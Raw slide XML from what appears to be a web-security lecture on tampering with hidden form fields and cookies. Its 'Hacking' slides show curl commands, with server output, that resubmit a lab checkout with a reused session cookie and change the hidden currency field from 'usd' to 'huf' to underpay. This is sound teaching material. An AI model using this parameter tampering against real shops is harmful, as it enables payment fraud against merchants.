            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1245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Tampering with Client-Side Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nothing prevents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>us from not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tampering with client-side information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tampering, by itself, is not a vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The question is: how does the server-side code respond to our tampering?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the server-side code allows our tampering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that tampering compromises the security of the application, then there is a vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145306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Form Fields</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we saw when studying web applications, an HTML input element with the type attribute of hidden will not be shown in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many legitimate uses for this behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The problem is when the server-side code blindly trusts the data that is placed in the hidden form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3966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5-02-12 at 10.44.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6603599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93669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4317"/>
            <a:ext cx="8229600" cy="5751848"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="400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&lt;title&gt;Hidden Form E-Commerce&lt;/title&gt;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&lt;h1&gt;Confirm Checkout&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  &lt;li&gt;Laptop - 1 @ $1,000&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  &lt;li&gt;Monitor - 1 @ $1,500&lt;/li&gt;	  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  Total price: $2,500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  Credit card: 4532471752161408</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>purchase.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  &lt;input type="submit" value="Purchase!"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	  &lt;input type="hidden" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>oid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" value="5929"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       &lt;input type="hidden" name="price" value="2500"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>       &lt;input type="hidden" name="cur" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;	  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19213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6" end="2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1" end="2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2" end="2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3" end="2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4" end="2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HTTP – Overview </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6869372"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524618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7" y="3383737"/>
            <a:ext cx="524618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45045" y="2528279"/>
            <a:ext cx="2204096" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024130" y="3490722"/>
            <a:ext cx="2356496" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776846" y="4427555"/>
            <a:ext cx="1808720" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121210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approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What possible hidden values are there to test?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What might they mean?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would be malicious versions of those values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to test the hypothesis?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11813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hack it!</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03197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Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All that's needed is a browser and a command-line tool (I use curl)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using curl, we can create a request to the purchase page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>curl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usd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> http://192.168.84.167/code/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>purchase.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>I don't know who you are, go away</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What's the problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not sending cookies, so must be a session issue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199027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Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, need to find our cookie from our browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then, we can use curl to include that cookie using the -b options</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usd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> http://192.168.84.167/code/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>purchase.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Purchase successful, your final order total is 2,500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> charged to your CC XXXXXXXXXXXX1408</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hurray, we were able to make a successful order</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13142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Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens when we manipulate the values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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=1 -F price=2500 -F cur=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> http://192.168.84.167/code/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>purchase.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>FAIL, not your order!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does price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price=1 -F cur=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> http://192.168.84.167/code/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>purchase.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>FAIL, not the correct price!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does cur stand for?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>oid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=5929 -F price=2500 -F cur=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>huf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> http://192.168.84.167/code/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>purchase.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Purchase successful, your final order total is 2,500 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>huf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> charged to your CC XXXXXXXXXXXX1408</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1855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2 at 11.0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711200"/>
            <a:ext cx="8699500" cy="5422900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1964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 Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we have seen, cookies are used to store state on the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server requests that the client store a bit of state on the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie can be any arbitrary data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just as we saw in the previous example, we can manipulate cookies via curl or with browser extension</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8857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URL Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
